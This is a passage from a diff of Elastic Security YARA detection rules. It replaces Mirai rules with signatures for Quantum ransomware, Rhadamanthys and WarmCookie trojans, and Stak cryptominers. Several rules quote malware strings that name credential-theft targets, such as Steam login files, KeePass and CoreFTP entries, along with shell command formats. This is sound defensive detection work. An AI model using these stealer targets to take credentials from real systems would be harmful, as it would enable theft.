"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Hacktool_Lightning.yar#L50-L72" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ad16989a3ebf0b416681f8db31af098e02eabd25452f8d781383547ead395237" + logic_hash = "f260372b9f2ea32f93ff7a30dc8239766e713a1e177a483444b14538741c24af" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca" + fingerprint = "7108fab0ed64416cf16134475972f99c24aaaf8a4165b83287f9bdbf5050933b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78281,28 +78620,31 @@ rule ELASTIC_Linux_Trojan_Mirai_520Deeb8 : FILE MEMORY os = "linux" strings: - $a = { ED 48 89 44 24 30 44 89 6C 24 10 7E 47 48 89 C1 44 89 E8 44 } + $a1 = "[+] %s:%s %d,ntop:%s,strport:%s" ascii fullword + $a2 = "%s: reading file \"%s\"" ascii fullword + $a3 = "%s: kill(%d): %s" ascii fullword + $a4 = "%s exec \"%s\": %s" ascii fullword condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_77137320 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Quantum_8513Fb8B : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Ransomware Quantum (Linux.Ransomware.Quantum)" author = "Elastic Security" - id = "77137320-6c7e-4bb8-81a4-bd422049c309" - date = "2021-01-12" - modified = "2021-09-16" + id = "8513fb8b-43f7-46b1-8318-5549a7609d3b" + date = "2023-07-28" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L735-L753" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9" - logic_hash = "ee48e0478845a61dbbdb5cc3ee5194eb272fcf6dcf139381f068c9af1557d0d4" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Quantum.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3bcb9ad92fdca53195f390fc4d8d721b504b38deeda25c1189a909a7011406c9" + logic_hash = "7e24be541bafc2427ecd8f76b7774fb65d7421bc300503eeb068b8104e168c70" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b" + fingerprint = "1c1af76ab5df8243b8e25555f1762749ca60da56fecea9d4131c612358244525" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78310,198 +78652,233 @@ rule ELASTIC_Linux_Trojan_Mirai_77137320 : FILE MEMORY os = "linux" strings: - $a = { 54 24 01 89 C7 31 F6 31 C9 48 89 A4 24 00 01 00 00 EB 1D 80 7A } + $a1 = "All your files are encrypted on all devices across the network" + $a2 = "process with pid %d is blocking %s, going to kill it" condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_A6A81F9C : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rhadamanthys_21B60705 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" author = "Elastic Security" - id = "a6a81f9c-b43b-4ec3-8b0b-94c1cfee4f08" - date = "2021-01-12" - modified = "2021-09-16" + id = "21b60705-9696-43ba-a820-d8ab9c34cca2" + date = "2023-03-19" + modified = "2023-04-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L755-L772" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "0d31cc1f4a673c13e6c81c492acbe16e1e0dfb0b15913fb276ea4abff18b32af" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Rhadamanthys.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3ba97c51ba503fa4bdcfd5580c75436bc88794b4ae883afa1d92bb0b2a0f5efe" + logic_hash = "ef3f60689d72553111b42b27e0a1a0316288ae07fbfaf159eea8c76380d528fa" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "e1ec5725b75e4bb3eefe34a17ced900a16af9329a07a99f18f88aaef2678bfc1" + fingerprint = "8a756bf4a8c9402072531aca2c29a382881c1808a790432ccac2240b35c09383" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 41 57 00 54 43 50 00 47 52 45 00 4B 54 00 73 68 65 6C 6C 00 } + $a1 = "Session\\%u\\MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword + $a2 = "MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword + $a3 = " \"%s\",Options_RunDLL %s" wide fullword + $a4 = "%%TEMP%%\\vcredist_%05x.dll" wide fullword + $a5 = "%%APPDATA%%\\vcredist_%05x.dll" wide fullword + $a6 = "TEQUILABOOMBOOM" wide fullword + $a7 = "%Systemroot%\\system32\\rundll32.exe" wide fullword condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Mirai_485C4B13 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rhadamanthys_1Da1C2C2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" author = "Elastic Security" - id = "485c4b13-3c7c-47a7-b926-8237cb759ad7" - date = "2021-01-12" - modified = "2021-09-16" + id = "1da1c2c2-90ea-4f76-aa38-666934c0aa68" + date = "2023-03-28" + modified = "2023-04-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L774-L792" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "49c94d184d7e387c3efe34ae6f021e011c3046ae631c9733ab0a230d5fe28ead" - logic_hash = "9625e4190559cc77f41ebef24f9bfa5e3d2e2259c12b301148c614b0f98b5835" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Rhadamanthys.yar#L27-L52" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9bfc4fed7afc79a167cac173bf3602f9d1f90595d4e41dab68ff54973f2cedc1" + logic_hash = "bf5d45fe79dacfc6aee5cfd788ec6ce77e99e55d5a6d294da57c126bedf75ee9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "28f3e8982cee2836a59721c88ee0a9159ad6fdfc27c0091927f5286f3a731e9a" + fingerprint = "7b3830373b773be03dc6d0f030595f625a2ef0b6a83312a5b0a958c0d2e5b1c0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 7E 1F 8B 4C 24 4C 01 D1 0F B6 11 88 D0 2C 61 3C 19 77 05 80 } + $a1 = "%s\\tdata\\key_datas" wide fullword + $a2 = "\\config\\loginusers.vdf" wide fullword + $a3 = "/bin/KeePassHax.dll" ascii fullword + $a4 = "%%APPDATA%%\\ns%04x.dll" wide fullword + $a5 = "\\\\.\\pipe\\{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}" wide fullword + $a6 = " /s /n /i:\"%s,%u,%u,%u\" \"%s\"" wide fullword + $a7 = "strbuf(%lx) reallocs: %d, length: %d, size: %d" ascii fullword + $a8 = "SOFTWARE\\FTPWare\\CoreFTP\\Sites\\%s" wide fullword condition: - all of them + 6 of them } -rule ELASTIC_Linux_Trojan_Mirai_7146E518 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rhadamanthys_Ae00F48C : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" author = "Elastic Security" - id = "7146e518-f6f4-425d-bac8-b31edc0ac559" - date = "2021-01-12" - modified = "2021-09-16" + id = "ae00f48c-f420-4a23-aae7-6f2bde29593c" + date = "2023-05-05" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L794-L811" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "374602254be1f5c1dbb00ad25d870722e03d674033dfcf953a2895e1f50c637d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Rhadamanthys.yar#L54-L74" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "56b5ff5132ec1c5836223ced287d51a9ecee8d2b081f449245e136b1262a8714" + logic_hash = "423b68717a7aead3c871e7fc744e35dad1cfd7727bfba2bdaec69fb782540380" score = 75 - quality = 75 + quality = 71 tags = "FILE, MEMORY" - fingerprint = "334ef623a8dadd33594e86caca1c95db060361c65bf366bacb9bc3d93ba90c4f" + fingerprint = "8e3d13998a8e512aabf15534d61c06e0c6c51a4e8e46456538c654694310e670" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 85 82 11 79 AF 20 C2 7A 9E 18 6C A9 00 21 E2 6A C6 D5 59 B4 E8 } + $a1 = { 75 30 8B 51 28 8B 41 2C 85 DB 74 03 89 53 28 85 D2 74 15 39 } + $a2 = { 3C 65 74 50 3C 68 74 2A 3C 6E } + $a3 = { 49 74 39 49 74 2D 49 49 74 29 49 49 74 25 49 49 74 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_6A77Af0F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rhadamanthys_Cf5Dd2E2 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" author = "Elastic Security" - id = "6a77af0f-31fa-4793-82aa-10b065ba1ec0" - date = "2021-01-12" - modified = "2021-09-16" + id = "cf5dd2e2-a505-4927-8653-3c9addd3ac90" + date = "2024-04-03" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L813-L830" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "7d7623dfc1e16c7c02294607ddf46edd12cdc7d39a2b920d8711dc47c383731b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Rhadamanthys.yar#L76-L97" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "39ccc224c2c6d89d0bce3d9e2c677465cbc7524f2d2aa903f79ad26b340dec3d" + logic_hash = "039d6de0d072be6717ba3eb90735d7b4898d3bbac83db4feb75efcdbca8fd98b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016" + fingerprint = "3b2bdfd45a11649deb3430044c7b707aebcf74a3745398e3db09a7465fa62a6c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 31 D1 89 0F 48 83 C7 04 85 F6 7E 3B 44 89 C8 45 89 D1 45 89 C2 41 } + $a1 = { 33 D2 49 8B C4 49 83 C4 57 48 F7 F7 41 8A C2 46 0F B6 04 1A 33 D2 42 8D 4C 05 00 C1 E9 03 F6 E9 8A C8 49 8B C0 41 C0 E8 05 } + $a2 = { 8A 04 19 32 03 88 04 1A 48 83 C3 01 48 83 EF 01 } + $a3 = { 4C 01 27 48 8B 0F 48 8B 47 10 C6 04 01 00 48 83 07 01 48 8B 0F 48 8B 47 10 } + $a4 = { 69 F6 93 01 00 01 0F B6 C0 48 83 C1 01 33 F0 8A 01 84 C0 } condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Mirai_5F7B67B8 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Rhadamanthys_C4760266 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Rhadamanthys (Windows.Trojan.Rhadamanthys)" author = "Elastic Security" - id = "5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e" - date = "2021-01-12" - modified = "2021-09-16" + id = "c4760266-bbff-4428-a7a5-bca7513c7993" + date = "2024-06-05" + modified = "2024-06-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L832-L849" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "b2aedc0361c1093d7a996f26d907da3e4654c32a6dbcdbab441c19d4207f2e2a" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Rhadamanthys.yar#L99-L117" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05074675b07feb8e7556c5af449f5e677e0fabfb09b135971afbb11743bf3165" + logic_hash = "b8c1c56681aac4e1b1741dfa3ea929677214873b6f1795423a80742f699249de" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940" + fingerprint = "53a04d385ef3a59b76500effaf740cd0e7d825ea5515f871097d82899b0cfc44" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 89 38 83 CF FF 89 F8 5A 59 5F C3 57 56 83 EC 04 8B 7C 24 10 8B 4C } + $a = { 55 8B EC 83 EC 14 83 7D 08 00 53 8B D8 74 50 56 57 8B 7D 0C 6A 10 2B FB 5E 56 8D 45 EC 53 50 ?? ?? ?? ?? ?? 83 C4 0C 90 8B 4D 10 8B C3 2B CB 89 75 FC 8A 14 07 32 10 88 14 01 40 FF 4D FC 75 F2 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_A3Cedc45 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Warmcookie_7D32Fa90 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Warmcookie (Windows.Trojan.WarmCookie)" author = "Elastic Security" - id = "a3cedc45-962d-44b5-bf0e-67166fa6c1a4" - date = "2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L851-L869" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1ae0cd7e5bac967e31771873b4b41a1887abddfcdfcc76fa9149bb2054b03ca4" - logic_hash = "9233e6faa43d8ea43ff3c71ecb5248d5d311b2a593825c299cac4466278cd020" + id = "7d32fa90-c6e0-4a4b-bc21-51d82c57721e" + date = "2024-04-29" + modified = "2024-05-08" + reference = "https://www.elastic.co/security-labs/dipping-into-danger" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_WarmCookie.yar#L1-L32" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ccde1ded028948f5cd3277d2d4af6b22fa33f53abde84ea2aa01f1872fad1d13" + logic_hash = "ed3be6e5c6127ef87f9ef6fe35b17815b96706e8e73a393ee9b0a8e3b0cd8f66" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8335e540adfeacdf8f45c9cb36b08fea7a06017bb69aa264dc29647e7ca4a541" + fingerprint = "ae6c81fc7b0ba16567fefa714d043556afa44bfd698f6478c21d6e6428b14858" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 74 2C 48 8B 03 48 83 E0 FE 48 29 C3 48 8B 43 08 48 83 E0 FE 4A 8D } + $seq_checksum = { 45 8D 5D ?? 45 33 C0 41 83 E3 ?? 49 8D 4E ?? 44 03 DB 41 8D 53 ?? } + $seq_string_decrypt = { 8B 69 04 48 8D 79 08 8B 31 89 6C 24 ?? 48 8D 4E ?? E8 } + $seq_filesearch = { 48 81 EC 58 02 00 00 48 8B 05 82 0A 02 00 48 33 C4 48 89 84 24 40 02 00 00 45 33 C9 48 8D 44 24 30 45 33 C0 48 89 44 24 20 33 C9 41 8D 51 1A FF 15 83 4D 01 00 85 C0 78 22 48 8D 4C 24 30 E8 1D } + $seq_registry = { 48 81 EC 80 02 00 00 48 8B 05 F7 09 02 00 48 33 C4 48 89 84 24 70 02 00 00 4C 89 B4 24 98 02 00 00 48 8D 0D 4D CA 01 00 45 33 F6 41 8B FE E8 02 4F 00 00 48 8B E8 41 B9 08 01 00 00 48 8D 44 24 } + $plain_str1 = "release.dll" ascii fullword + $plain_str2 = "\"Main Invoked.\"" ascii fullword + $plain_str3 = "\"Main Returned.\"" ascii fullword + $decrypt_str1 = "ERROR: Cannot write file" wide fullword + $decrypt_str2 = "OK (No output data)" wide fullword + $decrypt_str3 = "OK (See 'Files' tab)" wide fullword + $decrypt_str4 = "cmd.exe /c %ls" wide fullword + $decrypt_str5 = "Cookie:" wide fullword + $decrypt_str6 = "%ls\\*.*" wide fullword condition: - all of them + (3 of ($plain*)) or (2 of ($seq*)) or 4 of ($decrypt*) } -rule ELASTIC_Linux_Trojan_Mirai_7D05725E : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Stak_05088561 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" author = "Elastic Security" - id = "7d05725e-db59-42a7-99aa-99de79728126" + id = "05088561-ec73-4068-a7f3-3eff612ecd28" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L871-L889" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" - logic_hash = "ac2d0b81325ce7984bc09f93e61b42c8e312a31c75f09d37313d70cd40d3cf8b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Stak.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d0d2bab33076121cf6a0a2c4ff1738759464a09ae4771c39442a865a76daff59" + logic_hash = "2b0f8a4efdfb13abcc2a1b43e9c39828ea1de6015fef0ef613bd754da5aa3e9a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "7fcd34cb7c37836a1fa8eb9375a80da01bda0e98c568422255d83c840acc0714" + fingerprint = "dfcfa99a2924eb9e8bc0e7b51db6d1b633e742e34add40dc5d1bb90375f85f6e" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78509,28 +78886,27 @@ rule ELASTIC_Linux_Trojan_Mirai_7D05725E : FILE MEMORY os = "linux" strings: - $a = { 24 97 00 00 00 89 6C 24 08 89 74 24 04 89 14 24 0F B7 C0 89 44 } + $a = { CD 49 8D 4D 07 48 83 E1 F8 48 39 CD 73 55 49 8B 06 48 8B 50 08 48 8D } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Fa48B592 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Stak_Ae8B98A9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" author = "Elastic Security" - id = "fa48b592-8d80-45af-a3e4-232695b8f5dd" + id = "ae8b98a9-cc25-4606-a775-1129e0f08c3b" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L891-L909" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c9e33befeec133720b3ba40bb3cd7f636aad80f72f324c5fe65ac7af271c49ee" - logic_hash = "5648bcc96b1fdd1529b4b8765b1738594d0d61f7880b763e803cd89bd117e96b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Stak.yar#L21-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "aade76488aa2f557de9082647153cca374a4819cd8e539ebba4bfef2334221b0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8838d2752b310dbf7d12f6cf023244aaff4fdf5b55cf1e3b71843210df0fcf88" + fingerprint = "0b5da501c97f53ecd79d708d898d4f5baae3c5fd80a4c39b891a952c0bcc86e5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78538,27 +78914,28 @@ rule ELASTIC_Linux_Trojan_Mirai_Fa48B592 : FILE MEMORY os = "linux" strings: - $a = { 31 C0 BA 01 00 00 00 B9 01 00 00 00 03 04 24 89 D7 31 D2 F7 F7 0F } + $a = { D1 73 5A 49 8B 06 48 8B 78 08 4C 8B 10 4C 8D 4F 18 4D 89 CB 49 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_B9A9D04B : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Stak_D707Fd3A : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" author = "Elastic Security" - id = "b9a9d04b-a997-46c4-b893-e89a3813efd3" + id = "d707fd3a-41ce-4f88-ad42-d663094db5fb" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L911-L928" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "61575576be4c1991bc381965a40e5d9d751bba2680a42907b0148651716419fc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Stak.yar#L40-L58" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d0d2bab33076121cf6a0a2c4ff1738759464a09ae4771c39442a865a76daff59" + logic_hash = "b825247372aace6e3ce0ff1d9685b6bb041b7277f8967d5f5926b49813cfadc9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "874249d8ad391be97466c0259ae020cc0564788a6770bb0f07dd0653721f48b1" + fingerprint = "c218a3c637f58a6e0dc2aa774eb681757c94e1d34f622b4ee5520985b893f631" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78566,28 +78943,28 @@ rule ELASTIC_Linux_Trojan_Mirai_B9A9D04B : FILE MEMORY os = "linux" strings: - $a = "nexuszetaisacrackaddict" + $a = { C2 01 48 89 10 49 8B 55 00 48 8B 02 48 8B 4A 10 48 39 C8 74 9E 80 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_D2205527 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Stak_52Dc7Af3 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" author = "Elastic Security" - id = "d2205527-0545-462b-b3c9-3bf2bdc44c6c" + id = "52dc7af3-a742-4307-a5ae-c929fede1cc4" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L930-L948" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e4f584d1f75f0d7c98b325adc55025304d55907e8eb77b328c007600180d6f06" - logic_hash = "172ba256873cce61047a5198733cacaff4ef343c9cbd76f2fbbf0e1ed8003236" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Stak.yar#L60-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a9c14b51f95d0c368bf90fb10e7d821a2fbcc79df32fd9f068a7fc053cbd7e83" + logic_hash = "81998164f517b6f1ef72b10227cfff86aa8bbd2b4e2668f946c8ed59696ae74d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "01d937fe8823e5f4764dea9dfe2d8d789187dcd6592413ea48e13f41943d67fd" + fingerprint = "330262703d3fcdd8b2c217db552f07e19f5df4d6bf115bfa291bb1c7f802ad97" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -78595,28 +78972,28 @@ rule ELASTIC_Linux_Trojan_Mirai_D2205527 : FILE MEMORY os = "linux" strings: - $a = { CA B8 37 00 00 00 0F 05 48 3D 01 F0 FF FF 73 01 C3 48 C7 C1 C0 FF } + $a = { F9 48 89 D3 4D 8B 74 24 20 48 8D 41 01 4C 29 FB 4C 8D 6B 10 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Ab073861 : FILE MEMORY +rule ELASTIC_Linux_Cryptominer_Stak_Bb3153Ac : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Cryptominer Stak (Linux.Cryptominer.Stak)" author = "Elastic Security" - id = "ab073861-38df-4a39-ab81-8451b6fab30c" + id = "bb3153ac-b11b-4e84-afab-05dab61424ae" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L950-L968" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "175444a9c9ca78565de4b2eabe341f51b55e59dec00090574ee0f1875422cbac" - logic_hash = "251b92c4fec9d113025c6869c279247a3dd16ee094c8861fe43a33f87132bf75" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Cryptominer_Stak.yar#L80-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b974b6e6a239bcdc067c53cc8a6180c900052d7874075244dc49aaaa9414cca" + logic_hash = "e8516a24358b12863fe52c823ca67f0004457017334fe77dabf5f08d6bf2d907" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = 